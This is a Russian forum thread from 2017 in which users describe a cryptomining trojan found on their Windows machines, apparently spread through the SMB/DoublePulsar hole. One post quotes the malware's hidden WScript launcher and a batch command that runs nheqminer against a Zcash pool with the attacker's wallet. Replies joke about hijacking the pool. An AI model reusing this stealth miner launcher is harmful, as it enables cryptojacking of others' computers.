Потенциальная уязвимость!

123
menig
На сайте с 18.12.2015
Offline
71
#11

извиняюсь за глупый возможно вопрос, а папка winsxs родная?

G-and-Y
На сайте с 29.06.2013
Offline
156
#12

ппц а иногда читать серч полезно

На компе нашел (дом ПК)

C:\wwwskype\

nheqminer.exe

wwwskype.bat

wwwskype.js

*.dll

wwwskype.js

var WshShell, obj;
WshShell = WScript.CreateObject("WScript.Shell");
obj = WshShell.Run("C:\\wwwskype\\wwwskype.bat", 0);
WshShell = null;

wwwskype.bat

cd C:\wwwskype\
start /b /LOW nheqminer.exe -l eu1-zcash.flypool.org:3333 -u t1J1BCXT5mg4VmammNkLv4SH5dcwemGfxAS.rig0117 -t -1

анализ с https://virustotal.com/ru/file/aa6922f0e3743710a869db63a610a2c5f0ac4d0c4dea3da23bcc9f341cc9248f/analysis/

Абузо-устойчивые впс в Нидерландах от 5$/мес (https://cp.inferno.name/aff.php?aff=2991)
anchous
На сайте с 12.10.2010
Offline
139
#13
menig:
извиняюсь за глупый возможно вопрос, а папка winsxs родная?

роднее некуда = хранилище компонентов

Купить быстрые анонимные прокси в России, Европе и США (http://proxy4seo.net/)
bbp-net
На сайте с 03.04.2008
Offline
75
#14

Да уж, тот кто этот майнер запустил неплохо заработает. Уже почти по 2000$ в сутки ему капает :))

Вот хэш который в этом майнере прописан : 48okENqW61sXt3cDFYJEZMdnHDdoUY1ymE2wVDPSFM5Z2B6VJodU4kmL24w4vLcNv8ZqgynmJ3gq86MEbNsPkLHnTYh6zGR

Вбейте его в этом пуле : https://monero.crypto-pool.fr/

И наблюдайте за его доходами... прямо геометрическая прогрессия. За 10 дней уже более 20к$ заработал чел :)

P.S. И ежедневная прибыль продолжает расти как на дрожжах :P

kxk
На сайте с 30.01.2005
Offline
993
kxk
#15

anchous, Где-то была тулза что её чистила

---------- Добавлено 27.04.2017 в 12:53 ----------

bbp-net, Троянщики это всегда было выгодно

Ваш DEVOPS
bbp-net
На сайте с 03.04.2008
Offline
75
#16
kxk:
anchous, Где-то была тулза что её чистила

---------- Добавлено 27.04.2017 в 12:53 ----------

bbp-net, Троянщики это всегда было выгодно

Которая чистит х3, а вот проверить можно любую IP тут: doublepulsar.below0day.com

anchous
На сайте с 12.10.2010
Offline
139
#17
bbp-net:
Которая чистит х3, а вот проверить можно любую IP тут: doublepulsar.below0day.com

а нет такого же, только чтобы отканить и свой присунуть? :D ну и с перламутровыми пуговицами, естественно

kxk
На сайте с 30.01.2005
Offline
993
kxk
#18

anchous, Поидее можно пул сломать

anchous
На сайте с 12.10.2010
Offline
139
#19
bbp-net:
Вбейте его в этом пуле : https://monero.crypto-pool.fr/

вы, кстати, про первый вариант? или какой то свой?

ибо это, вроде как, майнит ZCash, а не монеро


cd C:\wwwskype\
start /b /LOW nheqminer.exe -l eu1-zcash.flypool.org:3333
kxk:
anchous, Поидее можно пул сломать

кстати хорошая идея, грабь награбленное

bbp-net
На сайте с 03.04.2008
Offline
75
#20
anchous:
вы, кстати, про первый вариант? или какой то свой?

ибо это, вроде как, майнит ZCash, а не монеро



кстати хорошая идея, грабь награбленное

Там их несколько версий есть этого трояна. Та что мне попалась майнила XMR. Но чел один и тот же, когда я грохал одну он мне сувал другую на комп :) потом мне надоело и просто закрыл 445 порт.

123

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий